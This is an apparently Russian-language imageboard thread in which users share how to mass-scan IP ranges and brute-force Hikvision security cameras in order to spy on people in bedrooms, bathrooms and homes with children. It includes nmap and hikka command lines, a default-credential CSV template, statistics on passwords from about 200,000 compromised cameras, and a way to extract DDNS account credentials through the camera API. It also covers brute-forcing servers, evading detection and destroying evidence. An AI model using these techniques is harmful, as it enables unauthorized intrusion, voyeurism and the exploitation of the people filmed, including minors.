>>74352 Спасибо, доброанон! Поясни тогда, пожалуйста, вот что: у меня есть список IP с https://4it.me/getlistip. Мне надо его просканить на 8000 порт, чтобы потом отдать результаты hikka. Я могу делать это руками, выбирая рандомный диапазон, но не хочу. Как заавтоматить это дело?
>>74354 скопировать из списка в файле, вставить в консоль к nmap, grep'нуть, то что выдал nmap и вставить в hikka. Хочется - скармливаем файл nmap, nmap пишет в файл, запускаем хикку с выводом nmap.
Вот такая ситуация случилась, аноны. Несколько недель наблюдал за интересной мне камерой, и вдруг она пропала. Уже дней 5. Просканил конкретно ИП этой камеры - нету камеры. Просканил диапазон хх.хх.хх.0-255 - в этом диапазоне нашлось несколько камер, но не те. В общем, на том ИП нет больше камеры. Вот в чём вопрос: Если кто-то сменил пароль, ведь не должен же Ип камеры поменяться, что тогда случилось? Хозяева поумнели и сделали её недоступной из внешней сети, или что? Часто у вас такое бывает? З.ы. Пересканил снова весь диапазон города - заветную камеру не нашёл/не сбрутил.
>>74365 часто так бывает. может камера ушла вообще в другой диапазон. зачастую хозяева меняют пароль или еще чаще просто включают камеру по востребованию.
>>74356 А пикрил тебя чем-то не устраивает? Скармливаешь ему большое количество диапазонов, на выходе получаешь файл со списком годных IP, и отдаёшь этот файл хикке.
>>74412 потому что пароли меняют и хозяин камеры сбрасывает камеру либо как то еще палятся что тоже приводит к потере камеры. тюрьма у меня тоже есть и почему то кажется что она скоро пропадет...
>>74412 Я первое что делаю когда нахожу годноту, проверяю если сконфигурирован DDNS и потом подключаюсь через него. Много камер сконфигурированы через hik-online.com.
Правда есть камеры которые просто так пропадают, или прото пароль меняют.
>>74419 >проверяю если сконфигурирован DDNS и потом подключаюсь через него А можно вот с этого места поподробнее для нуба? Как подключаешься? Что там делать надо? Млин, даже вопрос толком не могу сформулировать, потому что не очень понимаю что спрашивать. Просто хочу как ты. Расскажи плз, или хоть задай направление в котором копать. Попытаюсь разобраться.
Аноны, просветите куна. Ниасиливаю nmap. Сканю так: sudo nmap -sS -n -p 8000 -iL ips.txt -oG 8000.txt --open В ips.txt - список подсетей в CIDR. В результате получаю болт, то есть ничего. Специально скармливал подсети, где vnc находит пачку айпишников – nmap не находит нифига. Где туплю?
>>74645 не, не убунта. винда в виртуалке, пришлось поставить, ибо nmap не радует пока. есть подозрение, шо vnc много хостов проёбывает, решил открыть новый нестандартный путь
Анон, подскажи, я запускаю vns scanner - он лопатит диапазон какого-нибудь берлина неебическое количество времени. Можно как-нибудь ускорить?
И потом, на хосты, которые насканил VNC я травлю hikka. Вы потом фотки смотрите и руками добавляете или весь список засовываетев IVMS? Есть какое-нибудь менее говно, чем IVMS? Он нереально говняный и тормозной.
>>74835 Я весь список хостов, которые выходят из-под VNC(в моём случае я юзаю Kportscan), минуя хикку копирую в .csv-файл на 256 мест, в котором прописаны логин/пароль admin/12345 и закидываю его в IVMS. Наверное, без хикки проёбывается много камер, но как по мне, хикка пока это намусолит пароль своим брутом, времени проходит дохера. А по факту оказываются всё равно пароли =12345 или 123456. А диапазоны я сканю на своём рабочем компе, через тимвьюер, так что сеть на домашнем не зависает.
>>74836 определи, на каком провайдере сидели эти чешки http://420on.cz/catalog/list/16611 это сузит зону поиска. Айпишник они поменять могут, но меньше вероятности, что они поменяют провайдера. И сканируй уже диапазоны того провайдера в том городе, где нашёл.
Такое дело. Нашёл камеру.Живёт там баба довольно симпатичная. Камера нацелена на кровать. Но как-то так настроена, что когда она там появляется, камера отключается. Возможно ли в настройках что-то поковырять ,чтобы камера работала впостоянку?
>>74871 >когда она там появляется, камера отключается. Детекция движения наоборот? Странно как-то. А если появляется не она, то камера не выключается? Мне кажется, что баба эта сама камеру выключает каким-то образом. А то нелепо получается - камера выключается когда кто-то появляется. Не вижу смысла в наблюдении за статической картинкой, и автоматическом отключении камеры при движении.
>>74873 Может и сама отключает. Вполне возможно. Страна - 2ip говорит, что Италия. Город не говорит. А как-то посмотреть в настройках и определить, выключена камера вручную или автоматически - можно ли? Могу выложить скрины всех остальных пунктов в настройках.
Почитал в интернетах. Заявляют, что сканит быстрее и жрёт меньше ресурсов. Увеличена скорость работы сканера. По синтетическим тестам скорость стала выше скорости vnc scaner в 6 раз при одинаковом кол-ве потоков. * Потестю вечером.
есть кто горазд в дельфиях? Нужно запилить приблуду, чтобы она: 1. Запускаем её в той же папке, где лежит файл results.txt, который получился из-под Kportscan. 2. Открывает этот список хостов. 3. Выделяет первые 256 строк. 4. Ctrl+X, Ctrl+S, закрывает список хостов. 5. Открывает заготовку-шаблон admin-12345.txt, которая лежит в этой же папке. 6. Вставляет список хостов в эту заготовку. 7. Сохраняет полученный файл под именем, например список.csv
Это я думаю схалявничать, а то заёбищно каждый раз копировать, открывать, сохранять, вставлять эти строчки. А вот так, чтобы одной кнопкой? А? Я дохера хочу?
>>74910 Есть шаблон, куда мы вставляем скопированные хосты: # "001","0","","8000","0","admin","12345","0","1","0","0" "002","0","","8000","0","admin","12345","0","1","0","0" "003","0","","8000","0","admin","12345","0","1","0","0" "004","0","","8000","0","admin","12345","0","1","0","0" "005","0","","8000","0","admin","12345","0","1","0","0" "006","0","","8000","0","admin","12345","0","1","0","0" и так далее, до 256
этот файл сохранён в формате txt
хосты мы вставляем вон туда, между двумя кавычками, после "0","хост","8000" В акелпаде просто Alt+V - это значит вставить столбец. И сохраняем как "список.csv". А потом в IVMS этот список подсовываем.
>>74917 Да чот не понравилась она мне. Возможно, просто я не распробовал её. Но как я выше писал, один хрен она распознаёт только 12345 пароли. Брутить, КМК, нужно те хосты, про которые точно знаешь, что там вкусняшка. А то так молотит она день-ночь, а в результате там оказывается офис или склад.
>>74925 но это моё, очень дилетантское мнение. Я не программист ни разу и даже с веб-делами не разбираюсь ни фига. Все эти ДНС, проброс портов - это для меня лес тёмный. Поэтому ориентироваться на моё мнение как-то не надо.
вкусняшки тоже дело хитрое, смотря от куда диапазоны берешь. с начала брал с 4it.me со скана выходила пару адресов и те кривые. стал брать с shodan за скан камер тьма и штуки 3 годные...
>>74949 Ебанутый тут ты, если не смог увидеть, что он там ниже написал, что особе не умеет ей пользоваться. Ты походу маэстро нехуёвый? Так давай мастер-класс запили. Сссука, мудрых индейцев кругом как грязи и все из себя проффесионалы.
>>74950 >не умеет ей пользоваться Не умеет - пусть учится, а не пишет хуйню. >Ты походу маэстро нехуёвый? Так давай мастер-класс запили. Я ламер обыкновенный. Но когда мне было интересно посмотреть камеры, я стал читать, и разбираться. И разобрался. А мастер-классы для даунов делать не имею желания.
Может мне ещё домой приезжать к тем, кто не хочет разбираться, а хочет, чтобы всё и сразу работало, и настраивать им всё?
>>74952 Ну пиздец, теперь все, кто сам не может понять и решает спросить совета, должны в ноги тебе упасть, такому молодцу. А ты будешь на них сверху какашками жёваными плевать.
>>74959 Ты глупый? Я чпросил не ебанутый ли он, не потому, что он совета просил, а потому, что он заявил, что хикка не может в другие пароли кроме 12345. Понимаешь? Не за просьбу, а за ебанутое заявление.
>>74962 >>74959 Воу, не ссорьтесь. Мы тут делом заняты, аноны. Лучше поясните за шодан. И да, ёбаная IVMS-4200 пиздец тормозная - 20минут уже выкачиваю с архива видос.
>>74929 Хиккой удобно пользоваться хотя бы потому что она делает скрины по которым можно сразу решить нужна тебе эта камера или нет. Пароли добавь в файл passwords, логины в logins, запускай так hikka.exe -threads 400 -shoots pics\ -csv good.csv
В файле good.csv получишь список камер к которым хикка подключилась в папке - скрины с этих камер. Я смотрю только скрины и запихиваю в IVMS те камеры, которые хочу.
>>74869 Крыса-кун проявляет признаки хитрости,но у него нет шансов.А пока ловится,всякие писающие,какающие,трахающиеся,голые,лоли и прочая поебота,а мне хочется,чего нить этакого такого.
>>74949 А тут и я, тот ебанутый подтянулся. Да тут срач из-за меня! Радует. Ну так я и сказал, что это у меня не получается, это не значит, что у другого кого-то не получится. А чо ты так возбудился-то? Картинки вон какие достал? Любитель чтоль?
>>75079 нахуя ?! чтоб люди увидели годноту и ещё с большем рвением ринулись сканить и убивать камеры. Чтоб привлечь ещё больше людей к этой теме, чтоб ещё больше камер попроёбывали. Я блять молюсь чтоб этот тред похоронили нахуй.
>>75081 >Я блять молюсь чтоб этот тред похоронили нахуй. Малость поддвачиваю этого адеквата. Сейчас в бамплимите и не всплываем, а если потом кто-нибудь новый запилит, да ещё и с годной подробной шапкой? Будем на нулевой, какой-нибудь крыса-кун увидит, и снова запилит тред в /b/. И проебём последние остатки годноты.
Напишите сюда [email protected] пароль от камеры с нестандартным паролем, которую я высылал вчера с [email protected] двум или трём анонам. Я в ответ кину ссылку на приватную конфу в телеграме.
[email protected] пишите на обмен, вот например ориджинал контент с южной америки для примера. Кстати пару раз отписывал на той неделе на почты, ответа небыло чет. Вообщем шлите чтонить интересное на обмен. Ну или кто там конфу собирался делать можете инвайт дать тоже. Сижу тут с первых тредов.
>>75012 Это я, тот, альтернативно одарённый. А подскажите - в текстовом файле для хикки как прописать список хостов, чтобы захватить диапазон, например от 1.1.0.0-1.10.255.255? Чтобы не целым столбиком в 100500 штук, а типа как-то 1.1.0.0/16(Routerscan так пишет) или как-то так, чтобы она поняла?
Если добавляю --interface venet0 или --interface venet0:0 FAIL: failed to detect MAC address of interface: "venet0" [hint] try something like "--adapter-mac 00-11-22-33-44-55"
Если добавляю --adabter-mac unknown data link type: 113(LINUX_SLL)
Антон, мне надоело сканить с домашнего компа и держать его сутками включеным. Хочу попробовать дедик, но там я полный нуб. Разберусь как-нибудь. Задача сбрутить дедик. Пытался использовать DUBrute 2.0, но что-то ни одного положительного результата. Анон, скажи, если знаешь, эта прога вообще рабочая и мне разбираться, что я делаю не так, или она не пашет и нужно искать другую?
З.ы. Сегодня нашёл ещё одну, вечером пробовать буду, но вопрос всё равно актуален.
про правовую сторону давайте поговорим. За что будут преследовать, а за что нет. 1 ЦП, однозначно будут, даже если не из своей страны 2 Kport/VNC иметь на компе можно? 3 IVMS иметь можно, если в нём не открыты никакие камеры? 4 Если просто 256 айпишников с логином/паролем админ/12345 открыт в ИВМС - это статья? 5 пользование роутерсканом - статья? 6 пользование хиккой - скорее всего статья. 7 брутфорс хиккой например, американских камер, юзер находится в России - статья? 8 брутфорс хиккой российских камер юзер в России - статья? 9 VNC по 8000 порту американских хостов, юзер в России - статья? 10 VNC по 8000 порту ароссийских хостов, юзер в России - статья?
>>75285 Какие блядь юристы))) Ты чё сдаваться собрался))) Ты со своими подглядками нахуй никому ненужен - без обид. А если уж шизофрения нахлынула, как у многих здесь я уже заметил, почитав тред. Пользуйся дедиком + впн + тор и будет тебе блять тихое, спокойное счастье.
>>75305 разговор не про это. Нагрянули на работу какие-нибудь СОБРы или кто, опечатали компы, искали, может, бухгалтерскую документацию или что-то ещё. А тут - хопа! Порылись заодно и в твоём компе. И обнаружили там скрины/видео с чужих камер. Или хикку. Или VNC. Как будешь отмазываться? Что можно придумать, что, мол, хикка нужна мне для изучения... ну... мммм... Кваркэкспресса! Не? А вот я с помощью её чищу комп! А?
>>75252 Задумывался над таким вариантом. Но всё равно есть интерес самому поковыряться. Тем более с моим нубством, меня на серваке могут быстро спалить и удалить мою учётку или пароль сменить. Так что придётся постоянно покупать. А если разберусь как сбрутить и что там делать чтобы не спалили, так и профит очевиден. И, да, интересно поковыряться
>>75310 <мысли вслух> Если ты параноик, то нахрена это делать с работы? Если ты такой похуист, что делаешь это с работы, то не похую ли тебе? </мысли вслух>
>>75310 Мда... если у тебя и правда такая паранойя то сделай по типу батника на жёсткий диск. При включении компа у тебя будет секунд 5 что бы ввести пароль, не ввёл - жёсткий улетел в ебеня вместе с виндой и со всеми файлами. Больше я уже даже и не знаю что тебе сказать по этому поводу.
>>75318 Какие меры предосторожности чтобы не спалили тебя на дедике? Файлы/папки/процессы скрываешь как-то? Если знаешь хорошее место где про это почитать можно, линкани, плз. А то по разным форумам читаю - обрывочная информация, или возможно устаревшая. Практики ноль, пока не попробую не разберусь, но почитать-то надо.
>С сбрученным дедиком тоже самое, может неделю прожить а может и..... Если уж разобрался с процессом, то ни что не помешает сбрутить ещё. З.ы. И повторюсь - ну вот интересно мне самому это сделать.
Да ёб же иё мать! Она залезла на этот массажный столик в сапогах. В резиновых, БЛЯДЬ, САПОГАХ! Моей психике нанесена непоправимая травма. Как мне теперь с этим жить? Салон красоты... рыдает кровью
>>75465 Надеюсь, что тебя найдут и посадят. А когда на зоне узнают что ты ебанько-зоофил, тебя отпидарасят всем бараком, и будут повторять это каждый день и каждую ночь. Хочется надеяться, что ты просто тролль
>>75687 дохера паролей. 20-60 миллионов. И такой ещё вопрос вдогонку: она нормально перелопатит это количество или захлебнётся? У меня сложилось ощущение, что она держит в памяти не все их одновременно, а подгружает по мере надобности. Это я решил после того, как во время скана хиккой добавлял пароли в текстовый файл.
>>75688 к примеру я в дельфе слепил какие-то костыли, которые 37 знаков размещают на 10 местах. Это получается пиздец какой здоровый текстовый файл.У меня при генерации размер его дошёл до 14 гигов, а потом комп заклинило. Но, думаю, во-первых в текстовом редакторе столько строк не хватит, там тоже есть какое-то ограничение, типа как в экселе, а во-вторых у хикки памяти, в третьих у компа памяти, чтобы удерживать этот файл открытым.
Вот я и подумал о том, чтобы всё же сгенерировать эти десятизнаковые комбинации, но по разным файлам. 26 латинских букв + пробел + цифры 0...9.
>>75701 У меня на одной из любимых камер сменили пароль. При подключении через браузер выдаёт окно авторизации, но увы... старый логин:пароль не катит. Хочу попытаться сбрутить её снова, но вот потянет ли хикка большой пасслист? Да и ненаглядно хикка работает с одним ИП - не видно идёт процесс или нет. Может кто нибудь посоветует программу для брута через 80-ый порт?
>>75732 >забей Хороший совет, годный. Но интересно было. Хотя понимаю, раз уж пароль сменили - значит спалили, и даже если сбрутить снова, скорее всего теперь уже быстро спалят и снова сменят. Мне так кажется.
Эх, помню первый тред в Б, тогда ещё часть, как и я, из куротреда перетекла, тут даже ещё те вебмки проскакивают, лул. Курминь, б/ратья! Если здесь есть кто поймёт.
>>76043 Россию почти не сканил. Но вообще, не попадались. Тебя Силно интересует метро? Если да, то постараюсьь схоронить, если попадаться будет. Страна принципиальна, или ты просто на метро фапаешь?
>>76045 Мне просто интересно, защищены ли они. Я вдруг подумал, что этим сканированием может заниматься какой-нибудь террорист. А ведь я там каждый день езжу.
>>76505 Да,боюсь, ано не понравится тебе. Тормозит прилично, да и страшные они шопездец. Там эта одевалка есть с другого ракурса, но, кажется, с той камеры записи нет. Скачать можно, а перемотать в IVMS не получается. Из браузера тоже не открывается.
>>76548 Редкость, между прочим. Вдруг любитель найдётся - поменяешь на что-нибудь годное для тебя. За такую редкость много просить можно. Если ценитель найдётся.
>>76649 Работает. Правда, не постоянно, иногда пропадает - ни с IVMS ни с браузера не зайти. Но потом опять показывает. Перемотка есть. Изображение только ч/б. Расположена в Италии. [email protected]
>>76782 в смысле "в пустые"? Состоящие только из пробелов? У меня в словаре есть такие, но в скане не попадались. Но попадаются типа АА_А_А. С пробелами в середине слова.
кто может сказать, что это такое я нашёл? Интуиция подсказывает, что это что-то связанное с телевизором, но дальше этого голова не соображает http://a95-95-103-29.cpe.netcabo.pt/#
Странные люди. У них есть бассейн, но плавают они в нём раз в неделю. То, что папа ходит и трясёт мудями перед дочкой и мама машет сиськами перед сыном - наверное всё в порядке?
>>76829 раз в неделю для бассейна в доме это ещё годно, большинство для галочки держат, такое впечатление, что в проекте просто предусмотрено было, вощим, хули взять с богатеев...
>>76922 Антон, вот скажи, как ты третью пикчу выцепил? Или в этой квартире есть камеры в более интересном месте? Просто если на скрине из хикки получаю какой-нибудь коридор, то не смотрю его. Ты ведь не смотришь коридоры? Что было на той камере , которая привлекла твоё внимание к этой квартире?
Вообще, у меня такая идея - чтобы не было кидалова - делаете пользователя на камере без права сменить пароль, но с правом смотреть и скачивать архив - и все в шоколаде.
>>76935 >мамаша смазывает дочке задницу кремом Было у меня такое предположение, но показалось, что дочка большая, так что засомневался. Какая страна, если не секрет? Город же не скажешь?
>на 4-й архива нет Дай угадаю, на айпишнике всего одна камера? Часто замечаю, что камеры высокого качества стоят по одной и без архива. Антоны, почему так? Высокое разрешение/качество и одна камера на айпишнике - практически 100%, что нет архива. Огорчает это. Ведь такие камеры иногда в интересных местах стоят, а при отсутствии архива, становятся малоинтересными, потому что ловить момент заебёшся.
>>76942 Ну вы же не добавляйте пользователя HUY, EBLO, или MRAZ, как я видел с самого начала, а какой-нибудь tech support, user. И вообще, если на камере стоит дефолтный логин и пароль вы думаете хозяин знает как сменить его или посмотреть, какие пользователи есть ? Ебанулись совсем штоле ? Это самый нормальный способ смотреть всем ништяки, и не потерять камеру, ну и плюс DDNS еще .
>>77013 например, программой movavi videoconverter. Не все версии делают вебм. У меня 14 версия, делает. И тут ограничение по вложениям до 5 что ли мегабайт.
>>77037 Пока неизвестно. Архива в ней нет, смотреть через браузер не получается. Поставил на запись, буду перематывать и выяснять. но два предложения у нас уже есть: 1. Старушка, собирающая пузырьки. 2. Сексуальная милфа. Мне кажется, где-то там виднеется крышка из-под настойки боярышника, а это кардинально меняет дело.
>>77048 Это тебе, извращенцу, понятно. А для простых чайников создан нормальный человеческий интерфейс с кнопочками и движками. Или ты предлагаешь учить все эти пхп и си и всю прочую белиберду только ради того, чтобы в камеры посмотреть? Вот сиди и задрачивай, а у меня и без этого других дел много.
>>77095 Ну вот пользуйся годнотой, если у тебя её много. У меня не много, но если /б пробежится ещё раз по камерам, то годноты не останется. А в тред набежит толпа НЕАДЕКВАТОВ. Толпа. Да ну нах.
>>77169 какой долбаеб меняет в реальности нормальную годноту??? скидывают всегда либо уже совсем старье либо хуйню не нужную. ибо то что в самом деле стоящее оставалось в безопасном просмотре.а не губилось придурками.
Анон, такой вопрос. Заходил на камеры, которые стоят у меня в соседнем дворе. Всё было ок. Но с недавнего времени мне пишет, что веб страница недоступна. Что могло произойти? P.S юзеры данных камер даже нихуя не юзеры в плане навыков.
Подскажи, почему у меня хикка не создаёт список айпишников? В батнике прописано: hikka -threads 50 -check -shoots pics\ -csv ip.csv Уже менял слеш и в ту и в другую стороны - всё равно никак. Этот файл создаётся сразу или после окончания сканирования?
>>77229 Всё равно нихренашеньки. Может, хикку запускать надо как-то из-под админа? А в какой папке он должен создавать этот файл? Ведь в той же самой, где экзешник с батником лежат?
>>77415 Ну а как объяснить ещё тот факт, что я мог зайти на камеру месяц назад (и вообще следил за лолей всё лето), а сейчас пишет, что веб-страница не доступна.
>>77421 А если я знаю, что хозяева не знают нихуя? И IP не менялся довольно долго. Или другой вопрос. Как можно беспалева подключится к ихнему WIFI (знаю как он называется и я могу быть в пределах досягаемости) и узнать их IP, что бы потом подключится к камерам?
>>77424 Он нихуя не взламывает. Находит дохуя, но не может сдетектить даже названия сети. (но мою сеть он полностью палит, ахуительные способности программы просто)
Научите пользоваться nmap. Как в цель запихнуть диапазон ipшников? Через тире вроде не фурычит. Я сканировал рандомный IP, как понять есть на нём камера или нет? У него должен быть открытый порт или что?
>>77434 >что дальше? Дальше почитай этот тред с самого начала, полностью и внимательно. Если тут ответа нет, то почитай на архиваче старые треды. Где-то ответ точно есть.
>>77540 Млин, ну вот где вы находите такое, а? Камеры в спальнях, сколько я находил, очень неудачно всегда расположены. А тут прям на уровне кровати. Хоть милфы и не моя тема, но очень уж удачно камера стоит.
>>77555 ну, как вариант, без сканера сразу заебенить в хикку список диапазонов и наугах хуячить. Здесь мы проигрываем во времени, потому что хикка тогда перебирает каждый адрес в этом диапазоне, в том числе и нерабочие, но исключаем ошибки сканера. Наверняка есть какие-то адреса, которые сканер пропускает, а хикка их не пропустила бы.
>>77575 я имею в виду список от, скажем, 95.170.0.0 до 95.180.255.255 будет она молотить их с утра до вечера, 95% из них мёртвые, в оставшихся может, что-то и найдёт.
>>77596 Так и писал бы про список IP, а не про список диапазонов. Всё. Понял. А список этот чем генерить предлагаешь? Не руками же писать. Ты сам-то так делал?
>>77598 Да я себе в дельфи слепил костылик. Создаёт в корне диска цэ текстовый файл ipdiapason.txt http://rghost.ru/6N7LtvPY2 он, конечно, корявый, но список создаёт и ладно, а оптимизировать мне лень его.
>>77608 Это у меня сейчас в процессе. Но я программист пиздец какой неумелый. Вот если проскочила здесь эта идея, то стопудово кто-то ещё это сможет слепить за 10 минут. Я буду ковыряться ещё, наверное неделю-две.
>>77682 Может действительно просто мало ипов. А у всех хикка сразу закрывается, если все ип are dead? Просто хочу понять, у меня она правильно работает, но просто не может сбрутить данные адресса/просто там нечего брутити, или реально я что-то не так делаю/кривая версия.
>>77716 Там нет ничего интересного, поверь. Во-первых посетительницы все именно такие бегемотообразные. Во-вторых это какая-то проходная комната. Через неё и мужики ходят. В-третьих вот тебе этот айпишнег. 213.222.0.162
>>77720 Просканил этот ип. Думал найти чтонибудь более интересное. PORT STATE SERVICE 81/tcp open hosts2-ns 82/tcp open xfer 83/tcp open mit-ml-dev 84/tcp open ctf 85/tcp open mit-ml-dev 443/tcp open https 555/tcp open dsf 557/tcp open openvms-sysipc 558/tcp open unknown 559/tcp open unknown 560/tcp open rmonitor 561/tcp open monitor 1433/tcp open ms-sql-s 1911/tcp open mtp 1912/tcp open rhp-iibp 1913/tcp open unknown 1914/tcp open elm-momentum 1915/tcp open unknown 3013/tcp open gilatskysurfer 3014/tcp open broker_service 3015/tcp open unknown 5666/tcp open nrpe 8000/tcp open http-alt
Но что странно что только 8000 открывается. ... Какие нибудь идеи?
>>77780 Не редко на одном ИП находил другие камеры на других портов. И были интересные находки.
На этом ИП страннавато что-то. Порта 81-85 похожи на веб интерфейс других камер но непонятно почемы не могу подключится. нмап находит их а простой телнет не проходит ....
>>77791 ты, наверное, хочешь включить те три камеры: №6, №7, №8? Они показывают чёрный квадрат, но исправно записывают 7/24. Вопрос - занафигом они записывают эту черноту? Может ли такое быть, что по этим каналам запись идёт, а камер этиф просто физически нет?
>>77863 То есть ты даже не знаешь что там за камера, и при этом собираешься брутить её большим словарём? Потратить сутки на брут и увидеть автостоянку/склад/заовд %%или даже не увидеть%?
Пароль 789620 в твоих 20К Есть? А 123654789 есть? А ведь очень удобные пароли на нумпаде. Набор цифр с одной буквой и всё - хуй такое у тебя в словаре 20К будет. Я например, никогда не использую слова в качестве паролей. Ну, хоть то, что словарь должен хоть как-то подходить к стране языку ИП которой ломаешь, надеюсь ты понимаешь и без меня. Иногда ведь и даты рождения используют. У тебя все даты рождения в разных вариантах записи есть в твоём 20К словаре? Тебе виднее, анон, но я бы не стал заморачиваться с камерой на которой неизвестно что. Ты что, каждую камеру к которой стандартные пароли не подошли будешь огромным словарём ломать что ли? По-твоему на каждой камере, где нестандартный пароль - годнота?
Вот однажды на интересной камере сменили пароль, запустил брут словарём на 10КК слов. Честно говоря был даже удивлён, что пароль подобрался, не ожидал. Надеялся, но не ожидал. Считаю что мне просто повезло, и в другой раз на такую удачу не надеюсь. Ну, а ломать каждую камеру таким словарём - ДА НУ НАХ.
Но, тебе виднее, анон, дерзай. Если сбрутишь запили потом скрин с этой камеры. Реально интересно что там будет.
Я так понимаю в текстовом файле диапазоны типа 65.170.17.0-65.170.17.255 тьфз не тянет ? пишет could not resolve. Как тогда вставлять по городам адреса, какие выдает этот - https://4it.me/getlistip ?
>>77945 Есть годный гайд для полного нуба, как им пользоваться? Гугл мне не очень помог в поиске. Все объяснения, как будто я уже понимаю что нужно делать, и там нюансы уточнют. А я - НУБ!
>>77945 Может шодан и хорош. Но я расскажу как я делаю, а ты скажи получится ли быстрее с шоданом. Ок? Запускаю сканер когда ложусь спать и выключаю его когда возвращаюсь с работы на следущий день. Примерно часов 19-20 проходит. ИМХО это время можно даже не учитывать, так как мне ни чего делать не нужно. Полученные ИПы скармливаю хикки, и она пару часов брутит. Получаю Папку со скринами. За прошлые сутки примерно 34К скринов, уж не знаю со скольких камер. Моё дело теперь только просмотреть картинки и выбрать годноту. Так что реально моё время тратится только на пролистывание скринов.
В чём приимущество шодана? Быстрее? Находит много того что не увижу я, если отсканю диапазон в котором он показывает камеру? И как оценить в нём, что показывает эта камера? Он скрины делает или типа того?
Но что бы юзать эти API нужно платить 19$/месяц за 10000 кредитов в месяц. 1 кредит = 100 результатов. То есть, например твой запрос вернул 200 результатов то у тебя -2 кредита. В начале месяца опять занова 10000 кредитов.
Есть ещё вариант за 49$ в один раз. Это даёт 100 кредитов в месяц, то есть 10000 результатов.
Можно искать по разным критериям: ключевое слово, порт, страна, провайдер, дата добовление ...
Как я пользуюсь Слепил програмку в питоне каторая (кроном) каждое утро ищет все камеры за последниь день и добавляет данные в базу даннух (ип, порт, страна ...) Потом другая програмка на подобе хике (тоже в питоне) читает эти ип, брутит их, записывалет результат (логин, пароль, сериьный номер, дднс если есть или другая информация) в дугуюу табличку и сохраняет скрин. Скрины сохраняйу по датам и странам.
Всё это автоматизированно и мне остаётся только искать годноту. [user@server shodan]$ du -sh jpg/* 1.9G jpg/2015-11-03 3.1G jpg/2015-11-04 667M jpg/2015-11-05 5.0G jpg/2015-11-06 3.4G jpg/2015-11-07 1.7G jpg/2015-11-08 234M jpg/2015-11-09 166M jpg/2015-11-10 162M jpg/2015-11-11 134M jpg/2015-11-12 139M jpg/2015-11-15 589M jpg/2015-11-16 615M jpg/2015-11-17 501M jpg/2015-11-18 229M jpg/2015-11-19 242M jpg/2015-11-20 214M jpg/2015-11-21 131M jpg/2015-11-22 12K jpg/2015-11-23 427M jpg/2015-11-24 444M jpg/2015-11-25
>>77969 кровь из глаз ещё не идёт стока скринов отсматривать? ясно, что не успеваешь, а камеры имеют привычку дохнуть быстро, у меня так через неделю 1-3 из 10 уже того, избыточно энто
>>77969 Блджад! Писал большой и развёрнутый ответ тебе, а тут электричество отрубилось, и комп перезагрузился. Млин. Но общий сымысл был в том, что я не программист нихрена, от слова совсем. Так что если ты написал проги и автоматизировал процесс, то для тебя это годно, а в ручном режиме, видимо, не имеет ни какого смысла. Для кодера шодан - добро, для меня НЁХ бесполезная. Я прав?
Так что буду я постаринке сканить и брутить хиккой.
Судя по весу папок нехреновое количество пикч там лежит.
Кстати, про дднс. Есть камеры каторые проходят через стандартные дднс провайдеры как no-ip или dyndns. На таких камер можно получить login/password к дднс провайдера а там уже монгое чего интерессное. Например я напал на одном аккаунте где зарегестрированны более 400 камер. (конечно 12345 не на всех камер проходит но всё ровно есть интересное). Оказалось это кантора каторая устанавливает камеры
>>77999 Это не ты тот анон, что вкидывал тоннами Китай, Тайланд. Я имею ввиду может зальешь какую папку на файлообменник, а мы может что и найдём, что одному не под силу ?
>>78024 С помощу API hikvision можно получить логины и пароли дднс акаунтов.
сбрутил камеру (NET_DVR_Login) потом есть метод NET_DVR_GetDVRConfig который возвращает данные для подключения к дднс провайдеру в структуру NET_DVR_DDNSPARA_V30 где есть вся что нужно.
Если же смотреть эти данные через ивмс или веб интерфейс то пароль не видны, но через API всё можно получить.
Ну если вы не програмисты то вам это не понять (Я думал что в этом треде все хакеры програмисты).
Да, и извиняюсь за мой русский. Во первых я не русский, и русский для меня как инностранный язык. Во вторых пишу на транслите
Если кому то интересно ... sqlite> select login, count() as c from hikvision group by login order by c desc; admin|187004 guest|8322 user|3566 user1|555 user2|48 user3|20 support|17 sqlite> select password, count() as c from hikvision group by password order by c desc; 12345|155654 54321|9039 |8027 123456|6934 1234|3667 1111|2413 1|2056 admin|1968 654321|1397 11111|1239 55555|1015 111111|868 123456789|673 12345678|648 123|553 user|484 4321|425 666666|376 123123|372 1234567|348 77777|250 88888888|216 guest|158 qwerty|155 7777|121 7777777|100 4444|80 0|69 user1|67 nimda|54 12|38 999999999|24 5|18 333|10 support|6 22|4 user2|3 user3|2 asdf|1
>>78204 hikvision содержит все сбрутеные камеры sqlite> select count() from hikvision; 199532 sqlite> select min(ts), max(ts) from hikvision; 2015-08-21 12:12:27.558000|2015-11-26 06:22:07.378710
в табличке input все ип которые брутил. Значения result __OK__ сбрутено и скачал минимум 1 скрин __JPG__ логин проходит но не смог скачать ни один скрин __TO__ камера не отвечает __SEC__ логин не проходит __ERR__ и __UNK__ разные другие ошибки при подключения (возможно не камеры)
в табличке hikvision больше чем __OK__+__JPG__ потому что в начале ноября я удалил всё из input а в hikvision не удалял sqlite> select count() from hikvision where ts > '2015-11-01'; 166363
вот теперь картиночка полная, респект тебе, ну и последний вопросик, раз уж ты расщедрился на данные - геолокация, хотя бы континентально, примерно, конечно, по континентам
>>78211 не надо считать, просто по практике удачно сбрученных камер, где их плотность достаточна большая. и я правильно понимаю, азия и африка тут не присутствует?
>>78201 >|8027 На всякий случай уточнить хочу. Эта запись означает, что камера без пароля. Так? А каким образом в словаре паролей указат без пароля? null n/a или как? Ответь, плз.
>>78239 Я не использую хикку, у меня своя прога. В мой список паролей я ставлю пустую строку, просто нажми Enter. Думаю хикка тоже умеет читать пустые строки
Антуаны, кто сканировал разными сканерами подскажите плз, NMAP реально может сканить ощутимо быстрее чем KPortScan? Он NMAP действительно такой шустрый и умный как про него говорят? Просто я с консольными программами не очень дружу. Есть ли смысл разбираться со всеми его опциями? Будет ли ощутимый прирост скорости?
Пытаюсь разобраться с NMAP. Почитал в инете всякое. https://nmap.org/man/ru/index.html и пару разжёваных статей для нубов Сейчас проверить возможности нет - я на работе, проверить смогу только дома. Знающий анон, подскажи, может чего-то не хватает или лишнее что-то:
============================== Имеет ли смысл использовать T? -T[0-5]: Установить шаблон настроек управления временем (больше - быстрее) Если да, то какую цифру выбрать и почему? Более агрессивное/быстрое сканирование при значении 5. Так? Выбирать цифру исходя из ширины моего канала? Или при большей скорости провайдер скорее ругаться начнёт?
А я сообщу, что на https://4it.me/getlistip сменился дизайн. Будте осторожны!